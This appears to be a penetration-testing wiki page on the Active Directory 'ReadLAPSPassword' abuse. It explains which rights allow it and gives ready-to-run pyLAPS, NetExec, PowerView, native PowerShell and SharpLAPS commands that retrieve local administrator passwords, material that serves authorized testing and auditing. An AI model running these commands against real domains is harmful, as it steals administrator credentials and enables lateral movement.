ReadLAPSPassword
This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).
This page is about LAPS-based attacks, you may have a look on LAPS-based persistences and LAPS enumeration.
From UNIX-like systems, pyLAPS (Python) can be used to retrieve LAPS passwords.
pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101Alternatively, NetExec also has this ability
# Default command
netexec ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
netexec ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.
LAPSDumper is another Python alternative.
This can be achieved with the Active Directory PowerShell module.
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'The PowerView powershell module from PowerSploit can also be used for that purpose.
Get-DomainComputer "MachineName" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'Using native PowerShell
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { Write-Host "" ; $_.properties.cn ; $_.properties.'ms-mcs-admpwd'}SharpLAPS (C#) automates that process.
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"Resources
Last updated
Was this helpful?
